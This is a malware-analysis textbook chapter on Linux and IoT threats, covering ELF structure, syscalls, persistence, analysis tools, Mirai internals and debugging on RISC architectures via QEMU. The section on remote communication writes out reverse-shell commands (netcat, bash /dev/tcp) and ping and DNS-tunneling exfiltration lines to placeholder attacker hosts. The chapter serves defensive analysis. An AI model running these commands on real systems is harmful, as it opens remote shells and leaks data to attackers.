Many reverse engineers working in antivirus companies spend most of their time analyzing 32-bit malware for Windows, and even the idea of analyzing something beyond that may be daunting at first. However, as we will see in this chapter, the ideas behind file formats and malware behavior have so many similarities that, once you become familiar with one of them, it becomes easier and easier to analyze all the subsequent ones.
In this chapter, we will mainly focus on malware for Linux and Unix-like systems. We will cover file formats that are used on these systems, go through various tools for static and dynamic analysis, including disassemblers, debuggers, and monitors, and explain the malware’s behavior on Mirai.
By the end of this chapter, you will know how to start analyzing samples not only for the x86 architecture but also for various Reduced Instruction Set Computer (RISC) platforms that are widely used in the Internet of Things (IoT) space.
To that end, this chapter is divided into the following sections:
Many engineers think that the Executable and Linkable Format (ELF) is a format only for executable files and that it has been native to the Unix world from the very beginning. The truth is that it was accepted as a default binary format for both Unix and Unix-like systems only around 20 years ago, in 1999. Another interesting point is that it is also used in shared libraries, core dumps, and object modules. As a result, the common file extensions for ELF files include .so, .ko, .o, and .mod. It might also be a surprise for analysts who mainly work with Windows systems and are used to .exe files that one of the most common file extensions for ELF executables is, in fact, not having any.
ELF files can also be found on multiple embedded systems and game consoles (for example, PlayStation and Wii), as well as mobile phones. For example, in modern Android, as part of Android Runtime (ART), applications are compiled or translated into ELF files as well.
One of the main advantages of the ELF that contributed to its popularity is that it is extremely flexible and supports multiple address sizes (32 and 64 bit), as well as its endianness, which means that it can work on many different architectures.
Here is a diagram depicting a typical ELF structure:
Figure 11.1 – ELF structures for executable and linkable files
As we can see, it differs slightly between linkable and executable files, but in any case, it should start with a file header. It contains the 4-byte x7F’ELF’ signature at the beginning (part of the e_ident field, which we will cover shortly), followed by several fields mainly specifying the file’s format characteristics, some details of the target system, and information about other structure blocks. The size of this header can be either 52 or 64 bytes for 32- and 64-bit platforms, respectively (as for the 64-bit platforms, three of its fields are 8 bytes long in order to store 64-bit addresses, as opposed to the same three 4-byte fields for the 32-bit platforms).
Here are some of the fields useful for analysis:
The file header is followed by the program header; its offset is stored in the e_phoff field. The main purpose of this block is to give the system enough information to load the file to memory when creating the process. For example, it contains fields describing the type of segment, its offset, virtual address, and size.
Finally, the section header contains information about each section, which includes its name, type, attributes, virtual address, offset, and size. Its offset is stored in the e_shoff field of the file header. From a reverse-engineering perspective, it makes sense to pay attention to the code section (usually, this is .text), as well as the section containing the strings (such as .rodata), as they can give plenty of information about the purposes of malware.
There are many open source tools that can parse the ELF header and present it in a human-friendly way. Here are some of them:
Now, let’s talk about syscalls.
System calls (syscalls) are the interface between the program and the kernel of the OS it is running on. They allow user-mode software to get access to things such as hardware-related or process management services in a structured and secure way.
Here are some examples of the syscalls that are commonly used by malware.
These syscalls provide all the necessary functionality to interact with the filesystem (FS). Here are some examples:
Malware can use these for various purposes, including reading and writing other modules and configuration files.
Network-related syscalls are built around sockets. So far, there are no syscalls working with high-level protocols such as HTTP. Here are the ones that are commonly used by malware:
Network syscalls are commonly used to communicate with C&C, peers, and legitimate services.
These syscalls can be used by malware to either create new processes or search for existing ones. Here are some common examples:
There are multiple use cases for them, such as detecting and affecting AV software, reverse-engineering tools, and competitors, or finding a process containing valuable data.
Some syscalls can be used by malware for more specific purposes, for example, self-defense:
Of course, there are many more syscalls, and the sample you’re working on may use several of them in order to operate properly. The selection that’s been provided describes some of the top picks that may be worth paying attention to when trying to understand malware functionality.
When an engineer starts analyzing a sample and opens it in a disassembler, here is how the syscalls will look:
Figure 11.2 – A Mirai clone compiled for the ARM platform using the connect syscall
In the preceding screenshot, we can see that the number 0x90011B is used in assembly, instead of a more human-friendly connect string. Hence, it is required to map these numbers to strings first. The exact approach will vary depending on the tools that are used. For example, in IDA, in order to find the proper syscall mappings for ARM, the engineer needs to do the following:
Figure 11.3 – The ARM syscall mappings in IDA
In this case, it definitely makes sense to use a script in order to find all the places where syscalls are being used throughout the code and map them to their actual names to speed up the analysis.
Now, let’s explore various behavioral patterns commonly found in malware.
Generally, all malware of the same type shares similar needs regardless of the platform, mainly the following:
Some malware families behave as worms do, aiming to penetrate deeper into reached networks; this behavior is commonly called lateral movement.
The implementation depends on the target systems, given that they may use different default tools and file paths. In this section, we will go through the common attack stages and provide examples of actual implementations.
There are multiple ways that malware can get into a target system. While some approaches might be similar to those with the Windows platform, others will be different because of the different purposes they serve. Let’s summarize the most common situations:
This is how they look in Mirai’s source code:
Figure 11.4 – Hardcoded encrypted credentials in Mirai’s source code
As you can see, in this case, attackers preferred to store them in the encrypted form, but they still stored the original values as comments for easier maintenance.
Figure 11.5 – Multiple exploits embedded into a Mozi malware sample
For lateral movement, the same approaches are often used. Beyond this, it is also possible to collect credentials on the first system and try to reuse them with nearby devices.
As we can see, there is no easy solution regarding how to fix these issues for already existing devices. Regarding the future, the situation will improve only when the device manufacturers become interested in bringing security to their devices (either because of customer demands so that it is a competitive advantage, or because of specific legislation imposed); it is quite unlikely that the state of affairs will change drastically any time soon.
Persistence mechanisms can vary greatly depending on the target system. In most cases, they rely on the automatic ways of executing code that are already supported by the relevant OS. Here are the most common examples of how this can be achieved:
Other custom options specific to certain operating systems are also possible, but these are some of the most common cases often used by hackers and modern malware.
It is also worth mentioning that some malware families don’t bother with implementing persistence mechanisms at all, as they expect to be able to easily come back to the same device after its reboot through the same channel.
As we can see, there are multiple ways that malware can achieve persistence with the privileges it obtains immediately after penetration. It comes as no surprise that malware targeting IoT devices will try them first. For example, the VPNFilter malware incorporated crontab to achieve persistence, and Torii, incorporating some of Mirai’s code, tries several techniques, one of which is using the local ~/.bashrc file.
However, if at any stage the privilege escalation is required, there are several common ways that this can be achieved:
There are other creative ways that persistence can be achieved. For example, on older Linux kernels, it is possible to set the current directory of an attacker’s program to /etc/cron.d, request the dump’s creation in case of failure, and then deliberately crash it. In this case, the dump, the content of which is controlled by the attacker, will be written to /etc/cron.d and then treated as a text file, and therefore its content will be executed with elevated privileges.
Now, let’s dive deeper into the various ways that malware may communicate with a remote server controlled by the attackers.
There are multiple standard system tools found by default on many systems that can be used to interact with remote machines to either download or upload data, depending on their availability:
Figure 11.6 – IoT malware trying to download payloads using either wget or curl
For devices using the BusyBox suite, alternative commands such as busybox wget or busybox ftpget can be used instead. nc (netcat) and scp tools can also be used for similar purposes. Another advantage of nc is that some versions of it can be used to establish the reverse shell:
nc -e /bin/sh <remote_ip> <remote_port>
There are many ways this can be achieved – even bash-only (some versions of it) may be enough:
bash -i >& /dev/tcp/<remote_ip>/<remote_port> 0>&1
Pre-installed script languages such as Python or Perl provide plenty of options for communicating with remote servers, including the creation of interactive shells.
An example of a more advanced way to exfiltrate data bypassing strong firewalls is by using the ping utility and storing data in padding bytes (ICMP tunneling) or sending data using third-level (or above) domain names with the nslookup utility (DNS tunneling):
ping <remote_ip> -p <exfiltrated_data>
nslookup $encodeddata.<attacker_domain>
The compiled malware generally uses standard network syscalls to interact with the C&C or peers; see the preceding list of common entries for more information.
The main purposes of malware attacking IoT devices and Linux-based servers are generally as follows:
Figure 11.7 – Part of the script used by the IoT cryptocurrency mining malware
As we can see, the focus here is quite different from the traditional Windows malware due to the nature of the targeted systems.
Generic anti-reverse-engineering tricks such as detecting breakpoints using checksums or an exact match, stripping symbol information, incorporating data encryption, or using custom exceptions or signal handlers (setting them using the signal syscall that we discussed previously) will work perfectly for ELF files, pretty much the same as they do for PE files:
Figure 11.8 – An example of a custom xor-based string decryption algorithm in IoT malware
There are multiple ways that the malware can take advantage of the ELF structure in order to complicate analysis. The two most popular ways are as follows:
In relation to existing open source packing tools, UPX still remains the primary option used by IoT malware developers. However, it is common to corrupt internal UPX structures of the packed samples, which makes it impossible to use a standard upx –d functionality to unpack them straight away. The most common corruption techniques involve the following:
In addition, attackers may use a not-yet-released development version of the UPX to protect their samples. In this case, the latest release version of the UPX may be not able to process them even with the aforementioned modifications reverted. To circumvent this technique, use packer detection tools such as DiE to correctly identify the version of the packer applied and then use the right version of the UPX tool compiling it on your own if necessary.
In terms of syscalls, the most common way to detect debuggers and tools such as strace is to use ptrace with the PTRACE_TRACEME or PTRACE_ATTACH arguments to either make it harder to attach to the sample using the debugger or detect the debugging that is already happening.
Finally, the prctl (with a PR_SET_NAME argument) and chroot syscalls can be used to change the name of the process and its root directory respectively to avoid detection.
Some malware families go well beyond using classic anti-analysis techniques. An example would be the ZHtrap botnet, which is not only able to figure out whether it is running in a real environment or a honeypot but also to set up its own honeypot on a compromised device to passively build up a list of devices attempting to connect to it.
Another great example is rootkits, which can be used to achieve stealth capabilities, for example, to hide particular files, directories, or processes from the user. These are generally kernel modules that can be installed using the standard insmod command. The most common way that hiding can happen in this case is by hooking syscalls. Many rootkit malware families are based on public open source projects such as Adore-Ng or Knark.
Now, let’s talk about which tools can help us analyze IoT threats and how to use them properly.
There are multiple tools available to engineers that may facilitate both static and dynamic analysis of Linux malware. In this section, we will cover the most popular solutions and provide basic guidelines on how to start using them efficiently.
We have already covered the tools that can present the ELF structure information in a human-friendly way. Beyond this, there are many other categories of tool that will help speed up analysis.
The most popular solution, in this case, would be the standard file utility. It not only recognizes the type of data but also provides other important information. For example, for ELF files, it will also confirm the following:
Figure 11.9 – The output of a file tool used against an IoT malware sample
Its functionality is also incorporated into the libmagic library.
Another free for non-commercial use solution is the TrID tool, which introduces a nice, expandable database.
While this term is mainly used in forensics, it is always handy to extract all possible artifacts from the binary before going deeper into analysis. Here are some of the handy tools that are available:
These are heavy weapons that can give you the best idea about malware functionality but they may also take the longest time to master and work with. If you are unfamiliar with assembly, it is recommended to go through Chapter 2, A Crash Course in Assembly and Programming Basics, first to get an idea of how it works. The list of known players is actually quite big, so let’s split it roughly into two categories – tools and frameworks.
Here is a list of common tools that can be used to quickly access the assembly code:
Figure 11.10 – A list of architectures supported by ODA
Figure 11.11 – The multiple analysis options in Ghidra
This is definitely not an exhaustive list, and the number of such tools keeps growing, which gives engineers the ability to find the one that suits their needs best.
These libraries are supposed to be used to develop other tools, or to just solve some particular engineering task, using a custom script to call them:
With a big list of players on this market, the analyst may have an understandable question – which solution is the best? Let’s try to answer this question together.
A tool should always be chosen according to the relevant task and prior knowledge. If the purpose is to understand the functionality of a small shellcode, then even standard tools such as objdump may be good enough. Otherwise, it generally makes sense to master more powerful all-in-one solutions that support either multiple architectures or the main architecture of interest. While the learning curve in this case will be much steeper, this knowledge can later be re-applied to handle new tasks and eventually can save an impressive amount of time. The ability to do both static and dynamic analysis in one place would definitely be an advantage as well.
Open source solutions nowadays provide a pretty decent alternative to the commercial ones, so ultimately, the decision should be made by the engineer. If money doesn’t matter, then it makes sense to try several of them; check which one has the better interface, documentation, and community; and eventually, stick to the most comfortable solution.
Finally, if you are a developer aiming to automate a certain task (for example, building a custom malware monitoring system for IOC extraction), then it makes sense to have a look at open source engines and modules that can drastically speed up the development.
It always makes sense to debug malicious code in an isolated safe environment that is easy to reset back to the previous state. For these purposes, engineers generally use virtual machines (VMs) or dedicated physical machines with software that allows quick restoration.
These tools can be used to monitor malware actions that are performed on the testing system:
Figure 11.12 – Analyzing malware using a strace tool
It is always worth keeping in mind that behavioral analysis techniques generally produce limited results and, in most cases, should be carefully used together with static analysis to understand the full picture.
These tools intercept network traffic, which can give the analyst valuable insight into malware behavior:
The recorded network traffic can be shared between multiple engineers to speed up the analysis if necessary.
Debuggers provide more control over the execution process and can also be used to tamper and extract data on the fly:
Figure 11.13 – Stopping at the entry point in GDB and disassembling the instructions there
Now, let’s talk about emulators.
This software can be used to emulate instructions of the samples without actually executing them directly on the testing machine. It can be extremely useful when analyzing malware that’s been compiled for a platform that’s different from the one being used for analysis:
Figure 11.14 – An example of the Unicorn-based code used to emulate the shellcode
Finally, as an example, let’s talk about how to use radare2 for both static and dynamic analysis.
Many first-time users struggle with using radare2 because of the impressive number of commands and hotkeys supported. However, there is no need to use it as an analog for GDB. radare2 features very convenient graphical interfaces that can be used similarly to IDA or other high-end commercial tools. In addition, multiple third-party UIs are available. To begin with, to enable debugging, the sample should be opened with the -d command-line argument, as in the following example:
r2 -d sample.bin
Here is a list of some of the most common commands supported (all the commands are case-sensitive):
Figure 11.15 – An example of the commands supported by radare2
Visual mode hotkeys: Visual mode has its own set of hotkeys available that generally significantly speed up the analysis. In order to enter the visual mode, use the V command:
Here is how debugging using radare2’s visual mode will look:
Figure 11.16 – Staying at the entry point of malware in radare2 using its visual mode
Many engineers prefer to start the debugging process by running the aaa command (or using the –A command-line option) in order to analyze functions and then switch to visual mode and continue working there, but it depends on personal preference:
Figure 11.17 – Running an aaa command in radare2 before starting the actual analysis
Now, it is time to apply all this knowledge and dive deep into the internals of one of the most notorious IoT malware families – Mirai.
For many years, the Windows platform was the main target of attackers because it was the most common desktop OS. This means that many beginner malware developers had it at home to experiment with, and many organizations used it on the desktops of non-IT personnel, for example, accountants that had access to financial transactions, or maybe diplomats that had access to some high-profile confidential information.
As far as this is concerned, the Mirai (meaning future in Japanese) malware fully deserved its notoriety, as it opened a door to a new, previously largely unexplored area for malware – the IoT. While it wasn’t the first malware to leverage it (other botnets, such as Qbot, were known a long time before), the scale of its activity clearly showed everybody how hardcoded credentials such as root/123456 on largely ignored smart devices could now represent a really serious threat when thousands of compromised appliances suddenly start DDoS attacks against benign organizations across the world. To make things worse, the author of Mirai released its source code to the public, which led to the appearance of multiple clones in a short time. Here is the structure of the released project:
Figure 11.18 – An example of the Mirai source code available on GitHub
In this section, we will put our obtained knowledge into practice and become familiar with behavioral patterns used by this malware.
Luckily for reverse engineers, the malware author provided a good description of the malware functionality, accompanied by the source code, and even corrected some mistakes that were made by the engineers who previously analyzed it.
The bot scans IP addresses, which are selected pseudo-randomly with certain ranges excluded, asynchronously using TCP SYN packets, in order to find target candidates with open default Telnet ports first. Here is how it looks in the source code:
Figure 11.19 – Mirai malware excluding several IP ranges from scanning
Then, malware brute-forces access to the found candidate machines using pairs of hardcoded credentials. The successful results are passed to the server to balance the load, and all data is stored in a database. The server then activates a loader module that verifies the system and delivers the bot payload using either the wget or tftp tool if available; otherwise, it uses a tiny embedded downloader. The malware has several pre-compiled binary payloads for several different architectures (ARM, MIPS, SPARC, SuperH, PowerPC, and m68k). After this, the cycle repeats, and the just-deployed bots continue searching for new victims.
The main purpose of this malware is to organize DDoS attacks on demand. Several types of attacking techniques are supported, including the following:
Here is a snippet of Mirai’s source code mentioning them:
Figure 11.20 – The different attack vectors of Mirai malware
As we can see here, the authors implemented multiple options so that they could select the most efficient attack against a particular victim.
The original Mirai doesn’t survive the reboot. Instead, the malware kills the software associated with Telnet, SSH, and HTTP ports in order to prevent other malware from entering the same way, as well as to block legitimate remote administration activity. Doing this complicates the remediation procedure. It also tries to kill rival bots such as Qbot and Wifatch if found on the same device.
Beyond this, the malware hides its process name using the prctl system call with the PR_SET_NAME argument, and uses chroot to change the root directory and avoid detection by this artifact. In addition, both hardcoded credentials and the actual C&C address are encrypted, so they won’t appear in plain text among the strings that were used.
At first, it is worth noting that not all Mirai modifications end up with a publicly known unique name; often, many of them fall under the same generic Mirai category. An example would be the Mirai variant that, in November 2016, propagated using the RCE attack against DSL modems via TCP port 7547 (TR-069/CWMP).
Here are some other examples of known botnets that borrowed parts of the Mirai source code:
Other botnets exist, and often some independent malware also uses pieces of Mirai source code, which can mix up the attribution. There are multiple modifications that different actors incorporate into their clones, including the following:
Now, let’s talk about other famous IoT malware families.
While Mirai became extremely famous due to the scale of the attacks performed, multiple other independent projects existed before and after it. Some of them incorporated pieces of Mirai’s code later in order to extend their functionality.
Here are some of the most notorious IoT malware families and the approximate years when they became known to the general public. All of them can be roughly split into two categories.
The following category consists of malware that actually aims to harm:
Figure 11.21 – Some of the public DHT servers misused by Mozi malware
Then, there’s malware whose author’s intent was allegedly to make the world a better place. Examples of such families include the following:
Now, let’s talk about how to analyze samples compiled for different architectures.
Generally, it is much easier to find tools for more widespread architectures, such as x86. Still, there are plenty of options available to analyze samples that have been built for other instruction sets. As a rule of thumb, always check whether you can get the same sample compiled for an architecture you have more experience with. This way, you can save lots of time and provide a higher-quality report.
All basic tools, such as file type detectors, as well as data carving tools, will more than likely process samples associated with most of the architectures that currently exist. Online DisAssembler (ODA) supports multiple architectures, so it shouldn’t be a problem for it either. In addition, powerful tools such as IDA, Ghidra, and radare2 will also handle the static analysis part in most cases, regardless of the host architecture. If the engineer has access to the physical RISC machine to run the corresponding sample, it is always possible to either debug it there using GDB (or another supported debugger) or to use the gdbserver tool to let other debuggers connect to it via the network from the preferred platform:
Figure 11.22 – IDA processing a Mirai clone for a SPARC architecture
Here is how a Mirai-like sample can be analyzed using radare2:
Figure 11.23 – radare2 processing the same Mirai clone for the PowerPC architecture
Now, let’s go through the most popular RISC architectures that are currently targeted by IoT malware in detail.
As time shows, all static analysis tools aiming to support other architectures beyond x86 generally start from the 32-bit ARM, so it is generally easier to find good solutions for it. Since the 64-bit ARM was introduced more recently, support for it is still more limited. Still, besides IDA and radare2, tools such as Relyze, Binary Ninja, and Hopper support it as well.
However, this becomes especially relevant in terms of dynamic analysis. For example, at the moment, IDA only ships the debugging server for the 32-bit version of ARM for Linux. While it may be time-consuming to get and use the physical ARM machine to run a sample, one of the possible solutions here is to use QEMU and run a GDB server on the x86-based machine:
qemu-arm -g 1234 ./binary.arm
If the sample is dynamically linked, then additional ARM libraries may need to be installed separately, for example, using the libc6-armhf-cross package (armel can be used instead of armhf for ARM versions older than 7) for a 32-bit ARM or libc6-arm64-cross for a 64-bit ARM. The path to them (in this case, it will be /usr/arm-linux-gnueabihf or /usr/arm-linux-gnueabi for 32-bit and /usr/aarch64-linux-gnu for 64-bit respectively) can be provided by either using the -L argument or setting the QEMU_LD_PREFIX environment variable.
Now, it becomes possible to attach to this sample using other debuggers, for example, radare2 from another Terminal:
r2 -a arm -b 32 -d gdb://127.0.0.1:1234
IDA supports the remote GDB debugger for the ARM architecture as well:
Figure 11.24 – Available debuggers for the 32-bit ARM sample in IDA
GDB has to be compiled for the specified target platform before it can be used to connect to this server; the popular solution here is to use a universal gdb-multiarch tool.
The MIPS architecture remains popular nowadays, so it is no surprise that the number of tools supporting it is growing as well. While Hopper and Relyze don’t support it at the moment, Binary Ninja mentions it among its supported architectures. And of course, solutions such as IDA or radare2 can also be used.
The situation becomes more complicated when it comes to dynamic analysis. For example, IDA still doesn’t provide a dedicated debugging server tool for it. Again, in this case, the engineer mainly has to rely on the QEMU emulation, with IDA’s remote GDB debugger, radare2, or GDB itself this time.
To connect to the GDB server using GDB itself, the following command needs to be used once it’s been started:
target remote 127.0.0.1:1234 file <path_to_executable>
Once connected, it becomes possible to start analyzing the sample.
As with the previous two cases, static analysis is not a big problem here, as multiple tools support PPC architecture, for example, radare2, IDA, Binary Ninja, ODA, or Hopper. In terms of dynamic analysis, the combination of QEMU and either IDA or GDB should do the trick:
Figure 11.25 – Debugging Mirai for PowerPC in IDA on Windows via a QEMU GDB server on x86
As we can see, less prevalent architectures may require a more sophisticated setup to perform comfortable debugging.
SuperH (also known as Renesas SH) is the collective name of several instruction sets (as in, SH-1, SH-2, SH-2A, etc.), so it makes sense to double-check exactly which one needs to be emulated. Most samples should work just fine on the SH4, as these CPU cores are supposed to be upward-compatible. This architecture is not the top choice for either attackers or reverse engineers, so the range of available tools may be more limited. For static analysis, it makes sense to stick to solutions such as radare2, IDA, or ODA. Since IDA doesn’t seem to provide remote GDB debugger functionality for this architecture, dynamic analysis has to be handled through QEMU and either radare2 or GDB, the same way that we described earlier:
Figure 11.26 – Debugging Mirai for SuperH on the x86 VM using radare2 and QEMU
If for some reason, the binary emulation doesn’t work properly, then it may make sense to obtain real hardware and perform debugging either there or remotely using the GDB server functionality.
The SPARC design was terminated by Oracle in 2017, but there are still lots of devices that implement it. The number of static analysis tools supporting it is quite limited, so it makes sense to mainly use universal solutions such as ODA, radare2, Ghidra, and IDA. For dynamic analysis, QEMU can be used with GDB the same way that we described previously, as it looks as though neither radare2 nor IDA supports a GDB debugger for this architecture at the moment:
Figure 11.27 – Debugging a Mirai sample for SPARC on the x86 VM using GDB with TUI and QEMU
Various GDB-syntax-highlighting tools can be used to make the debugging process more enjoyable.
Now, you know how to deal with the most common architectures targeted by IoT malware families. In the following section, we will talk about what to do if you have to deal with something not covered here.
What happens if you have to analyze a sample that doesn’t belong to any of the architectures mentioned at some stage? There are many other options available at the moment and more will very likely appear in the future. As long as there is a meaningful amount of devices (or these devices are of particular potential interest to attackers), and especially if it is pretty straightforward to add support for them, sooner or later, the new malware family exploiting their functionality may appear. In this section, we will provide guidelines on how to handle malware for virtually any architecture.
At first, identify the exact architecture of the sample; for this purpose, open source tools such as file will work perfectly. Next, check whether this architecture is supported by the most popular reverse engineering tools for static and dynamic analysis. IDA, Ghidra, radare2, and GDB are probably the best candidates for this task because of an impressive number of architectures supported, very high-quality output, and, in some cases, the ability to perform both static and dynamic analysis in one place:
Figure 11.28 – The radare2 main page describing the argument to specify the architecture
The ability to debug may drastically speed up the analysis, so it makes sense to check whether it is possible to make the corresponding setup for the required architecture. This may involve running a sample on the physical machine or an emulator such as QEMU and connecting to it locally or remotely. Check for native architecture debugging tools; is it GDB or maybe something else? Some engineers prefer to use more high-end tools such as IDA with GDB together but separately (so, debug only specific blocks using GDB and keep the markup knowledge base in IDA).
When you get access to the disassembly, check which entity currently administrates this architecture. Then, find the official documentation describing the architecture on their website, particularly the parts describing registers, groups, and syntax for the supported instructions. Generally, the more time you have available to familiarize yourself with the nuances, the less time you will spend later on analysis.
Finally, never be ashamed to run a quick search for unique strings that have been extracted from the sample on the internet, as there is always a chance that someone else has already encountered and analyzed it. In addition, the same sample may be available for a more widespread architecture.
In this chapter, we became familiar with malware targeting non-Windows systems such as Linux that commonly power IoT devices. Firstly, we went through the basics of the ELF structure and covered syscalls. We described the general malware behavior patterns shared across multiple platforms, went through some of the most prevalent examples, and covered the common tools and techniques used in static and dynamic analysis.
Then, we took a look at the Mirai malware and put our newly obtained knowledge into practice by using it as an example and coming to understand various aspects of its behavior. Finally, we summarized the techniques that are used in static and dynamic analysis for the malware targeting the most common RISC platforms and beyond. By this point, you should have enough fundamental knowledge to start analyzing malware related to virtually any common architecture.
In Chapter 12, Introduction to macOS and iOS Threats, we will cover the malware that targets Apple systems, as this has become increasingly common nowadays.